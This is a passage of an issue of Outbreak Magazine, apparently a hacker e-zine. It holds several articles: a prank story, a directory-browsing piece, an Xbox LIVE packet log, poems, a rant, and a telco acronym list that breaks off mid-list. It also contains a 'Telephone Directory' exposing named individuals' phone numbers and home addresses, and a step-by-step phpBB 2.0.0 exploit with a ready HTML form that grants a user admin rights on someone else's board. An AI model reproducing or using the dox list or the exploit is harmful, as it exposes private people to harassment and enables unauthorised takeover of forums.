It seems one of them has set his password as "l33thaxx0r", hmm, I think we
have a target. I feed him a dummy FBI login page and echo his terminal, lets
see what he does.
After a pause of a few seconds i get a "HELP LOGON" message tentatively
crawl across my screen. I use NET SEND to send him a little message:
"UNAUTHORISED ACCESS DETECTED, TRACE COMMENCING". The kid closes the message
very fast and the dummy screen even faster, no doubt hes panicking. I watch
as he pulls up explorer and heads straight for the SYSTEM32 folder, no doubt
he's going for CMD.EXE to delete himself off the network. I at least let him
open the program before I kill the connection between his keyboard and his
terminal.I send him another message: "CONNECTION IDENTIFIED ..... LOCATION:
LONDON, ENGLAND". I know all the kid can do is sit and watch as I continue
(what a shit I am).
"USER: BETTSM PWORD: L33THAXX0R ADDRESS: 51 UNION ROAD, CLAPHAM,
LONDON"
That does it. I hear a door open in the classroom and the sound of an
twelve year old boy crying and shitting his pants as he runs from the IT
centre. I delete his account, I doubt he'll ever be back.
Well that concludes this episode of BAFH but if you liked it let me
know and I might write another few. I can't take any of the credit for
such a great concept as this and all credit goes to Simon Travaglia,
who wrote the original series, Bastard Operator From Hell, which you
can get from www.textfiles.com under the Humour / BOFH section.
Shout outs:
Kleptic, Timeless, snadman, all at #outbreakzine and on DALNET, the
'Kru' (RIP), DADFAD, HMB, Spin and Shag.
Tune in next time,
Same GPC time,
Same GPC channel,
Same GPC humour,
Different GPC text file.
Peace.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 6 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Telephone Directory:
======================
Disclamer: All information in this text file is public information found
in phone books across the country. Enjoy.
======================
[Goat]
Real Name: Jason Jackson
Home: 847-519-0468
Cell: 847-421-6900
AIM: Ecko, Suspendedgoat02, Blew
======================
[Roland Heurich]
Wife: Kristine
Home: 301-776-7646
7664 Kindler Rd
Laurel, MD 20723
======================
[Relapse]
Real Name: Jean-Patrick Pelanne
Phone: 281-334-5597
2101 Autumn Cove Dr
League City, TX 77573
======================
[sekzul]
Cell: 909-333-6733
======================
[Chris Ulmer]
Line 1: 410-282-7213
Line 2: 410-282-1780 (internet line)
7223 Bridgewood Dr
Baltimore, MD 21224
======================
enjoy!!
Love
DoxBot
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 7 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Want admin on phpBB 2.0.0?
--------------------------
PhpBB is a popular free bulletin board package available at phpbb.com,
which google reports as having 100+ implementations at the time of
writing this article.
A coding error exists in the admin_ug_auth.php script (used to set
permissions), which means that although admin rights are needed to view the
page, anyone can post data back to it no questions asked. Therefore,
if you already know what kind of response the board is looking for, you
can go straight ahead and tell it directly that you want to give admin
rights to a specific account. If you do not already have an account on
the board in question, you will have to create one.
One way to test this would be to set up a board yourself, (which you
have admin rights over) and edit a copy of the form used to update
permissions, but for people who dont want to goto those lengths, Ive
provided some sample code below:
<html>
<head>
</head>
<body>
<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
Before using the sample code you must first find out two bits of
information which are both easily obtained. The base directory of the board,
(usually something like http://www.mydomain.com/phpBB2), which is found
by taking off index.php from the main page URL, and the user number of
the account you wish to give admin. To do this go to the forums member
list page, click your username, then note down the number shown at the
right end of the URL you are now at. (if no users have been deleted
from the board, then the number next to your username on the members list
page under the # column will also be your true user number, but play
it safe and use the one in the URL). When you have all the
information, ensure you log out from the board. (otherwise, you will get a
permissions error later on, as StankDawg discovered).
Now edit the form action in the sample code above to be the full
location of the boards base directory plus the location of the admin script.
Usually, this is in a subdirectory from the base directory called
/admin/. Your result should look something like this:
action=http://www.domain_name/board_directory/admin/admin_ug_auth.php. Save
the changes to your page when you are done.
Next just call it in a local browser window, typing the user number you
obtained into the user number box on screen, and hit submit. On your
next log in, there will be a link at the bottom of every board page
saying "Go to Administration Panel" and additional options will appear on
screen when you are viewing a specific thread to enable you to edit,
delete, lock individual posts/threads etc.
by nick84
http://rootsecure.net
http://www.stankdawg.com
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 8 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Homework Help
=============
by: Asphalt Jones
=============
http://www.asphaltjones.tk
Asphalt J0nes: Hey bizzo. whats going down in your general direction this fine afternoon?
thelasthero666: nm studying
thelasthero666: u?
thelasthero666: who are u ?
Asphalt J0nes: oh, the usual.. hanging out in my underwear and boots playing some pong on the ol' boob tube.
Asphalt J0nes: i'm Asphalt Jones padre
Asphalt J0nes: rocker without a doubt.
thelasthero666: ??
Asphalt J0nes: you know it.
thelasthero666: ic
Asphalt J0nes: straight up rocking in the free world my friend
Asphalt J0nes: ripping shit up oldschool
Asphalt J0nes: like there was no yesterday
Asphalt J0nes: guns of steel
thelasthero666: haha icic
Asphalt J0nes: yeah dude
Asphalt J0nes: its good to see
Asphalt J0nes: my cousin Lenny had troubles seeing when he was a kid
thelasthero666: so wat u up to/?
Asphalt J0nes: and they made him wear these big ass glasses
Asphalt J0nes: looked like fucking coke bottles
thelasthero666: haha
Asphalt J0nes: yeah.. we used to kick his ass for looking like a fucking walleye
Asphalt J0nes: that dipshit
Asphalt J0nes: so what are you studying?
Asphalt J0nes: sex ed?
Asphalt J0nes: Asphalt Jones is down with that shit
Asphalt J0nes: the ladies call me Asphalt Bones
Asphalt J0nes: if ya know what im saying
thelasthero666: hahaha
Asphalt J0nes: thats right..
thelasthero666: nah studying economic
Asphalt J0nes: you know what i'm talking about!
Asphalt J0nes: economics? dammmn.
Asphalt J0nes: thats no good.
Asphalt J0nes: you need to go out and bone some ladies.
Asphalt J0nes: take it from Asphalt
thelasthero666: haha
thelasthero666: werd
Asphalt J0nes: Asphalt knows..
Asphalt J0nes: screw economics..
Asphalt J0nes: and while you're screwing that
Asphalt J0nes: go screw some ladies
Asphalt J0nes: YEAH!
thelasthero666: haha
Asphalt J0nes: you know it padre
thelasthero666: alrite igoing out payce
Asphalt J0nes: dont forget to rock out with yer cock out..
Asphalt J0nes: makes the world a better place
thelasthero666: no duobt
Asphalt J0nes: \m/
thelasthero666 signed off at 1:47:56 PM.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 9 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Basic Directory Transversal
By: StankDawg@hotmail.com
http://www.StankDawg.com/
When digging into a system it is always smart to look for obvious lack of
security instead of looking at holes within the security. In other words,
if you want to poke around a system, look for the obvious, visible openings
before engaging in actually attacking the security of the system. I look at
this as being given access instead of gaining unauthorized access, which
legally, is a big difference. Now I am not a lawyer, but these are two
completely different things in my mind.
Basic directory transversal involves seeing what directories are publicly
accessible without "breaking into" anything. More advanced forms of directory
transversal involve using these basic principles to slide through security by
using things like "/../" and hex codes to try and fool the software into
allowing you access to directories that were not intended to be accessible.
But lets stick to the basics for now. For example, depending on the type of
web server running, you are probably familiar with the fact that there is a
specific default directory structure that usually contains at least one
subfolder called "images." No HTML is usually stored in this directory, but
there are images there. If the privileges are not set up properly, you can
browse to the images directory and see all of the files contains within.
Take this one step further and see what other directories you can get into.
You might find directories called "content," "templates," "members," or
pretty much anything. Each one of these folders should be locked down to
prevent unauthorized access. The sad reality is that they are not. During
your normal browsing of a site, or your intentional targeting of a site,
notice the directory structure of the site. Notice that you may suddenly
jump two directories deep. You may click on a link from the main page to a
page located at "../content/articles/page1.html." Notice that you are
entirely bypassing a directory. It is usually these directories that are
nsecured. Either the administrators are too lazy to lock that directory
down, or they dont even realize that it is publicly accessible. Even though
there is no link to it, simply navigate to that directory and see if there
is anything there. You may be surprised at what you find.
From this point, you should look for a pattern. Is everything else also
stored in subdirectories beneath the "content" directory? If it is open,
you will see the list of files and subdirectories. They may not be listed
on the home page, or linked to from any other page on the entire site.
They may be pages that are under construction, or pages that have been
removed for one reason or another (when I say removed, I mean that the links
were removed, but obviously the pages may still exist). Sometimes you may
find "objectionable content" that was removed by request. Frequently you
will find the new updated home page in a subdirectory just waiting to be
moved into the root directory. The really fun stuff is finding a "secret"
page that some 31337 h4x0r has "hidden" on his site that only friends are
supposed to know about, or a page that is under construction and was not
intended to be available yet. I have, on many occasions, had accounts
removed for turning in a prize claim or contest entry before the page has
been released!
There is a lot that you can do to find the directory structure of the site,
and I will leave that for a future article if there is interest. I find this
style of hacking particularly interesting because it sits in that "grey area"
between publicly available and "breaking-and-entering." Again, I do not know
the law, but I am sure it sides with the companies who own the sites. If we
access a page or a directory that is publicly accessible or available (as long
as you know where to look) could we (and should we) be prosecuted? Were any
laws technically or even ethically broken? Is this entrapment? Or are we
just giving lazy incompetent administrators free run to perpetuate insufficient
security by their own lack of ability? I think that if something is so
important that you dont want it out on the internet, then dont put it on a
server without adequate protection. If you do, I think you as an administrator
should be held responsible. Isnt it hypocrisy to punish hackers for accessing
a file yet not punishing the host for releasing the file? They should be held
accountable for their mistakes instead of blaming the hackers. If we have the
potential to go to jail, so should they.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 10 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
--------------------------------------------------------------------------
A small look at Xbox LIVE
By: Turbanator
--------------------------------------------------------------------------
When Microsoft first released details about their new online gaming
service for the Xbox, people were skeptical. "Do I have to give out a
credit card over my console?", "Will my information be hacked?", and
"Where does this information go?" were just some of the questions people
asked about the service. Microsoft responded that they have "Military
Grade encryption" with the Xbox LIVE service, and I recently found out
how close that is to the truth.
Now, I dont know alot about encryption, so pardon me if I get
something wrong. I originally sought out to "hack" into the Microsoft servers
to get into Xbox LIVE account, but found out that it was impossible.
Why? Because the packets of data sent between an Xbox and the LIVE
server are UDP, which cannot be connected to, BUT, they can be intercepted
>:]
I managed to capture about 5 minutes worth of activity on the Xbox
LIVE service, all of which I will not display here. But I will point out
some things that caught my eye.
In this log, you can clearly see that the communication between my
xbox, and the live server, change ports frequently (and this is about 10
seconds worth of activity!).
21:39:22.087612 IP turbanator.3074 > 207.46.246.6.3074: udp 1404
21:39:22.176623 IP 207.46.246.6.3074 > turbanator.3074: udp 795
21:39:22.201939 IP turbanator.3074 > 207.46.246.6.3074: udp 320
21:39:22.275442 IP 207.46.246.6.3074 > turbanator.3074: udp 24
21:39:22.341035 IP turbanator.3074 > 207.46.246.6.3074: udp 36
21:39:22.415943 IP 207.46.246.6.3074 > turbanator.3074: udp 36
21:39:22.416038 IP turbanator.3074 > 207.46.246.6.3074: udp 32
21:39:22.469919 IP turbanator.3074 > 207.46.246.6.3074: udp 224
So what Microsoft said about "Military Grade encryption" is somewhat
true, though im not an encryption expert, so I dont know if the packets
are encrypted or not. Its also a good idea to have the ports change
constantly, and to have them UDP, so no one can connect to the server.
I've also noticed that Xbox LIVE never uses the same server when it logs
on, it switches everytime you log out of the service. This is also a
good security measure. If one day the Xbox LIVE service is infact
cracked one day, it will be intresting to see how its done, because it would
take alot!
BIG thanks to dropcode for helping me with the packet interception!
:)
--------------------------------------------------------------------------
This text file was written by:Turbanator
For:Outbreak
The author can be contacted at:turbanator2k2@yahoo.com,
AIM=Turbanator2k2
--------------------------------------------------------------------------
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 11 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
****************************************
* GPC's Poetry Corner *
* *
* Written by GPC *
* On 21:15 07/11/02 *
* heelflip_the_biscuit_tin@hotmail.com *
* *
****************************************
Welcome to GPC's poetry corner where I enderver to show the effects of
too much thought and not enough sleep / drugs. Here's a vaguely technology
related poem although obviously, its open to interpretation, email me if you
think it means something (or anything), it wud be interesting to hear.
Data spirals forever,
Ever increasing,
Ever frustrating,
Internal errors,
Fuck with the minds,
Of those not,
Plugged in.
Watch the blue bar,
It almost made it,
That time.
Fatal errors,
Of our minds.
Don't connect,
Don't give in,
It'll kill you.
Well there you go, it has no title and it has weird meaning but hey,
you get what you pay for. Hmm, i think I'll give you another one actually,
this, like the other one has no title but you might like it (if there's still
anyone reading....)
My own little world,
The world being mine that I own.
All alone,
Lonely in this world.
Come join me,
Room for two.
There being room for two,
So we sat.
The type of sitting,
One would call standing,
If one lived,
In any other world.
Of course I'm bored.
The world being mine that I own,
My own little world.
Well there you go, email me at heelflip_the_biscuit_tin@hotmail.com if
you have anything to say or even if you're just still reading this.
Shout outs:
Kleptic, Timeless, snadman, all at #outbreakzine and on DALNET, the
'Kru' (RIP), DADFAD, HMB, Spin and Shag, sitting_tree, DC guys and Michael
Moore.
Tune in next time,
Same GPC time,
Same GPC channel,
Same GPC humour,
Different GPC text file.
Peace.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 12 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
For the simple minded that want to hack your ISP and hotmail accounts
here is the answer you have been waiting
for.
You see it every single day.... " Hey can someone tell me how to hack a
hotmail account " or the one with more balls " Hey how do I hack my ISP ",
then you wonder, can America's youth and their knowledge of the Internet
really be so blind? After seeing these questions day in and day out in
channels on dalnet that I chat in.... its come to my attention that, YES
the majority of the people out there that get in to this whole concept
called " hacking " (which has become such a stained word that I hate ever
fucking using it anymore) are completely blind to it and think that they
can " hack " anything by joining a channel on their favorite IRC network
called hack, hacking, or something of the sort and expect to get actual
simple answers to their retarded and sometimes ridiculous questions. Just
think about it for more then 5 seconds which is hard for most of the wasted
young minds out there and you will realize that if it was as easy as just
asking some random person in a hacking channel how to hack/crack your
own ISP then wouldn't it be done on a daily base? And wouldn't your ISP be
going down on a daily base? Or maybe that your ISP actually hire
professionals that get paid more money then your entire family combined to
stop people like you and that they might actually be doing a damned good job?
I mean I'm not saying it's impossible because it's far from that but if any
thought at all was put in to this concept by the average person he should
come to a conclusion that this task would be a very hard to accomplish and
almost impossible feat that would take many years of learning every loop
hole and exploit and every OS that your ISP could own and then on top of
that knowing more about your ISP then the CTO and all his workers know
combines about there own system. But no we have these simple-minded, usually
young people that can be using their age to learn and make the Internet
stronger and eventually gaining new concepts that they could spread to more
people online to better the Internet and the security issues out there,
wasting it all and simply asking these stupid questions hoping for a easy
method that they can point click and kill their ISP then spread the word to
their best bud to look like some hardass hacker that took his whole ISP down.
I mean seriously WHAT THE FUCK were you thinking when you even came up with
the idea to take down such a powerful company (not in all cases ). It's very
sad, I hope that people that ask these questions are reading this, those fools
who join those hacking channels and ask this retarded shit get some sort
of idea of what I'm talking about. Even though I doubt this will solve any
problems with it but if it can even stop one person and make him think of
learning on his own a bit and to stop asking these stupid questions and
actually trying to figure out why it would never work then I have done my job.
-- Evo255x@hotmail.com
Aim : evo255x (feel free to ask me how to hack your ISP or hotmail
account, I'm more then happy to lecture for the ignorant)
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 13 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
// TAR - Telco Acronym Reference
//
// by dual_parallel
//
// http://www.oldskoolphreak.com
>>>shouts to C4 and the DDP <<<
*XX - speed dialing
5ESS - #5 Electronic Switching System
AABS-APS - Automated Alternate Billing Services-Automated Position System
AAC - Alarm Conversion Circuit
AAL - ATM Adaptation Layer
ACD - Automated Call Distributor
ACE - ATM Circuit Emulation
ACQS - Automated Charge Quotation Services
ACTS - Automated Coin Toll Service
ADAS - Automated Directory Assistance System
ADSL - Asymmetrical Digital Subscriber Line
AFM - ATM Feed Multiplexer
AIN - Advanced Intelligen Network
AIU - Access Interface Unit
ALI - Automatic Location Identification
AM - Administrative Module
AMA - Automatic Message Accounting
AMLB - Automated Muti Leaf Bulletin
ANAC - Automated Number Announcement
ANAC - Automatic Number Announcement Circuit
ANI - Automatic Number Identificaiton
ANI - Automatic Number Identifier
APPRC - Application Recent Change
APS - Automated Position System
ARU - Audio Response Unit
ASCII - American Standard Code for Information Interchange
ASM - Administrative Service Module
ASP - Advanced Services Platform
AT - Administrative Terminal
A-TA - Asynchronous-Terminal Adapter
ATA - Automated/Automatic Trouble Analysis (OSS-network)
ATM - Asynchronous Transfer Mode
ATMI - ATM Interface Unit
BAF - Bellcore AMA Format
BAIU - Broadband Access Interface Unit
BICC - Bearer Independent Call Control
BLNA - Busy Line No Answer
BLV - Busy Line Verification
BMI - Begin Managed Introduction
BRCS - Business and Residence Custom Services
BRI - Basic Rate Interface
BST - Basic Service Terminal
BVA - Billing Validation Application
BW - Bandwidth
CALEA - Communication Assistance to Law Enforcement Act
CAMA - Centralized Automatic Message Accounting
CAP - Carrierless Amplitude and Phase
CAPIS - Customer Accessible Product Information System
CAS - Customer Account Services
CCC - Call Content Channel
CCC - Commercial Credit Card
CCI - Computer Consoles Incorporated
CCIS6 - Common Channel Interoffice Signaling System Number 6
CCITT - International Telegraph and Telephone Consultative
CCQS - Centralized Charge Quotation Service
CCRS - Bellcore Customer Change Reuqest System
CCS - Common Channel Signaling
CDC - Call Data Channel
CDMA - Code Division Multiple Access
CDP - Custom Dialing Plan
CDPD - Cellular Digital Packet Data
CDX - Compact Digital Switch
CFR - Centralized Flexible Rating
CFV - Call Fowarding Variable
CI2 - Control Interface 2
CIC - Carrier Identification Code
CLASS - Customer Local Area Signal System
CLEC - Competitive Local Exchange Carrier
CM - Communications Module
CMC - Cellular Mobile Carrier
CMP - Communication Module Processor
CMT - CCS Message Transport
CNA - Connecting Network Access
CNA - Customer Name Address
CNI - Change Number Intercept
CNI - Common Network Interface
CO - Central Office
COMDAC - COMmon Data And Control Circuit
CORE40 - MC68040 based processor
CORE60 - MC68060 based processor
CPE - Customer Premise Equipment
CSD - Circuit Switched Data
CSS - Cluster Support System
CSV - Circuit Switched Voice
CTI - Computer Telephone Integration
DA - Directory Assistance
DA/LS - Directory Assistance/Listing Service
DAA - Directory Assistance Automation
DACC - Directory Assistance Call Completion
DACS/C - Directory Assistance System Computer
DAL - Data Access Line
DAL - Direct Access Link
DF2 - Data Fanout 2
DCI - DSCh Computer Interconnect
DCLU - Digital Carrier Line Unit
DCPPU - Direct Current Power Protection Unit
DCS - Digital Cellular Switch
DDM - Dual Digtal Multiplexer
DDS - Digital Data Service
DID - Direct Inward Dial
DII - Direct Intelligent Interface
DIOR - Direct International Orginations
DLC - Digital Loop Carrier
DLTU - Digtial Line Trunk Unit
DMT - Discrete Multi-Tone
DN - Directory Number
DNT - Dialed Number Trigger
DNU - Digital Network Unit
DNU-S - Digital Networking Unit-SONET
DOJ - Department of Justice
DOPS - Digital Ordering and Planning System
DRM - Distinctive Remote Module
DS-0 - Digital Signal Level 0 (1 Channel/64 Kbps)
DSCh - Dual Serial Channel
DSL - Digital Subscriber Line
DSLAM - Digital Subscriber Line Access Multiplexer
DSU2-RAF - Digital Subscriber Unit 2-Recorded Announcement Function
DTMF - Dual Tone Multi Frequency
EADAS - Engineering and Administrative Data Acquisition System
EAIU - Expanded Access Interface Unit
EAS - Extended Area Service
EC - Echo Cancellation
ECD - Equipment Configuration Database
ECP - Engineering Change Procedure
EDU - External Disk Unit
EIS - External Information System
EM - Element Management
EMS - Element Management System
EOTAS - External Operator Trouble Report Analysis System
ESA - Emergency Service Adjunct
ESN - Emergency Service Number
EVRC - Enhanced Variable Rate Coding
EXM2000 - Extended Module 2000
FACR - Feature Activation Counting & Reconciliation
FCA - Fully Coded Addressing
FCCS - Foward Call-Call Screening
FDMA - Frequency Division Multiple Access
FEP - Front End Process
FFA - First Feature Applicaiotn
FGD - Feature Group D
FMC - Force Management Center
FMO - Future Mode of Operation
FMSI - Force Management System Interface
FR - Frame Relay
GMB - Group Make Busy
GSM - Global System for Mobile Communications
HDSL - High bit-rate DSL
HOBIC - Hotel Billing Information Center
HOBIS - Hotel Billing Information Service
HSM - Host Switching Module
IAM - Initial Address Message
ICC - Illinois Commerce Commission
IDDD - International Direct Distance Dialing
ILEC - Independent Local Exchange Carrier
IN - Intelligent Network
IP - Intelligent Peripheral
ISAS - ISDN Smart Attendant Services
ISDN - Integrated Services Digital Network
ISLU - Integrated Services Line Unit
ISP - Intermediate Switching Point
ISP - Internet Service Provider
ISUP - ISDN User Part
ISVM - Interswitch Voice Messaging
iVTOA - Integrated Voice Telephony Over ATM
IXC - Interexchange Carrier
JIP - Jurisdiciton Information Parameters
Kbps - Kilobits per second
LAG - Line Access Gateway
LASS - Local Area Signaling Services
LCC - Line Class Code
LD - Long Distance
LDAP - Lightweight Directory Access Protocol
LDIT - Local Digit Interpreter Table
LDSU - Local Digital Service Unit
LEA - Law Enforcement Agency
LEC - Local Exchange Carrier
LIDB - Line Information Data Base
LNP - Local Number Portability
LRN - Local Routing Number
LS - Listing Service
LSDB - Listing Services Data Base
LSPI - Local Service Provider Identificaiton
LTD - Local Test Desk
LTS - Loop Test System
LTSB - Line Time Slot Bridging
LU - Line Unit
MARCH - Bellcore System for end office service requests
MBG - Multiswitch Business Group
Mbps - Megabits per second
MCC - Master Control Center
MDBA - Multiple Data Base Access
MDF - Main Distruting Frame
MDN - Mobile Directory Number
MECH - More Efficient Call Handling
MF - Multi-Frequency
MFFU - Modular Fuse and Filter Unit
MHD - Moving Head Disk
MLPP - MultiLevel Precedence and Preemption
MM - Multi-Media
MMB - Member Make Busy
MMRSM - Multi-Module Remote Switching Module
MMSU - Modular Metallic Service Unit
MP - Modem Pool
MSA - Metro Service Area
MSC - Mobile Switching Center
MTB - Metallic Test Bus
MUX - MUltipleX
MWI - Message Wating Indicator
NAES - Network Administration and Engineering Support group
NAI - Network Access Interrupt
NCT - Network Control and Timing
NEBS - National Electrical Building Standards
NEBS - New Equipment and Building Standards
NEL - Next Event List
NI-2 - Network Interconnect
NOTIS - Network Operator Trouble Information System
NP - Number Portability
NPA - Number Portability Area
NPV - Net Present Value
NRC - Network Reliability Center
NRPM - Notice of Proposal Rule Making
NSC - Network Software Center
NT - Network Termination
NTP - NetMinder
NXX - Office code
OA&M - Operations, Administration, and Maintenance
OAP - OSPS Adminstrative Processor
OC-1 - Optical Carrier-1
ODBE - Office Data Base Editor
ODD - Office Dependent Data
OHD - Off-Hook Delay
OIU - Optical Interface Unit
OLS - Originating Line Screening
OMP - Operations Maintenance Platform
ORDB - Operator Reference Data Base
ORM - Optically Remote Terminal
OS - Operating System
OSDE - On-Site Data Evolution
OSPS - Operator Services Position System
OTO - Office-To-Office
OTR - Operator Trouble Reports
OWS - OSPS Operator Services Workstation
OXU - Optical Transmission Unit
PCM - Pulse Code Modulation
PCS - Personal Communications Services
PCT - Peripheral Control and Timing
PCTFI - Peripheral Control and Timing Facility Interface
PDC - Packet Data Channel
PDS 3.0 - Packet Driver Solution 3.0
PF - Private Facility
PH - Packet Handler
PH - Protocol Handler
PHV - Protocol Handler for Voice
PIDB - Peripheral Interface Data Bus
PLI - Peripheral Link Interface
PLTU - PCT Line and Trunk Unit
PMO - Present Mode of Operation
PO - Peripheral Optioning
PPP - Point-to-Point Protocol
PRI - Primary Rate Interface
PSAP - Public Safety Answering Point
PSDI - Pin Service Denial Indicator
PSM - Position Switching Module
PSTN - Public Switched Telephone Network
PSU - Packet Switch Unit
PVC - Permanent Virtual Circuit
QoR - Query on Release
QPH - Quad-link Protocal Handler
QSS - Quote Support System
RADSL - Rate-Adaptive Digital Subscriber Line
RAF - Recorded Announcement Function
RAO - Revenue Accounitng Office
RaP - Record and Playback
RAS - Remote Access Server
RAS - Remote Access Service
RASM - Recorded Announcement Systems Manager
RBOC - Regional Bell Operating Company
RC - Recent Change
RC/V - Recent Change/Verify
REX - Routine Exercise
RFA - Receive Frame Area
RISLU - Remote ISDN Line Unit
RN - Ring Node
ROP - Read Only Printer
RSD - Rapid Software Delivery
RSM - Remote Switch Module
RT - Remote Terminal
RTBM - Real-Time Billing Memory
RTCD - Real-Time Call Detail
RTRS - Real-Time Rating System
RTU - Right-To-Use
SABM - Stand-Alone Billing Memory
SAS - Security Administration System
SAS - Security Announcement System
SCC - Switching Control Center
SCE - Service Creation Environment
SCE - Signal Conversion Electronics
SCN - Service Circiut Node
SCP - Service Control Point
SEI - Switch Engineering Information
SG-SS7 - 7R/E Signaling Gateway-SS7
SH - Stop Hunt busy
SLC - Subscriber Loop Carrier
SM - Switch Module
SM-2000 - Switching Module-2000
SMC - Switch Module Control
SMDS - Switched Multimegabit Digital Service
SMF - Single Mode Fiber
SMP - Switching Module Processor
SMS - Service Management System
SMSI - Simplified Message Service Interface
SODD - Static Office Dependent Data
SONET - Synchronous Optical NETwork
SPID - Service Profile Indicator
SPs - Service Providers
SQL - Standardized Query Language
SS7 - Signaling System Number 7
